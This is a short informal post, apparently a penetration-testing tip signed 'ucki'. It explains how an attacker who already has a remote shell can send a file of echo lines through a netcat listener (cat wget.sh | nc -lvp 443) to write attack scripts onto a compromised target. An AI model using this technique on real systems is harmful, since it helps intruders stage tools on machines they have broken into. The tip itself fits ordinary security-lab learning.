Ok, you have a shell but you want to have some cool scripts on the target to get cracking on .. well till now I just made a bunch of files with echo „bla bla“ > script.txt and copy pasted them line for line … well
If you set up your nc like this:
cat wget.sh |nc -lvp 443
It will just pipe all that nice echo lines into your command shell. So you have your scripts on the target.
Doh … so much time wasted ..
cheers ucki